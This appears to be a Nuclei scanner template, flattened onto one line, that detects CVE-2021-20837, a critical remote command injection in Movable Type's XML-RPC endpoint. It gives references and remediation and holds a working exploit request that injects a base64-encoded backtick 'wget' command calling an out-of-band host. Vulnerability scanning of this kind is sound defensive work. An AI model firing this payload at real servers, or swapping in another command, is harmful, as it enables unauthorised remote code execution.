id: CVE-2021-20837 info: name: MovableType - Remote Command Injection author: dhiyaneshDK,hackergautam severity: critical description: MovableType 5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8. 2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors. remediation: | Apply the latest security patches or updates provided by the vendor to fix the remote command injection vulnerability in MovableType. reference: - https://nemesis.sh/posts/movable-type-0day/ - https://github.com/ghost-nemesis/cve-2021-20837-poc - https://twitter.com/cyber_advising/status/1454051725904580608 - https://nvd.nist.gov/vuln/detail/CVE-2021-20837 - http://packetstormsecurity.com/files/164818/Movable-Type-7-r.5002-XMLRPC-API-Remote-Command-Injection.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-20837 cwe-id: CWE-78 epss-score: 0.97165 epss-percentile: 0.99739 cpe: cpe:2.3:a:sixapart:movable_type:*:*:*:*:premium:*:*:* metadata: max-request: 1 vendor: sixapart product: movable_type tags: packetstorm,cve,cve2021,rce,movable http: - raw: - | POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1 Host: {{Hostname}} Content-Type: text/xml mt.handler_to_coderef {{base64("`wget http://{{interactsh-url}}`")}} matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" - type: word words: - "failed loading package" - type: status status: - 200 # digest: 4a0a0047304502210093db480009823e1d6f1ed15e30b72ee94bb116473c4f3e66cbacbbad80fc86580220541a5877fca8a0c24d27bcf4e3d5c7ccefbd8d14da0d465264af1952413004e5:922c64590222798bb761d5b6d8e72950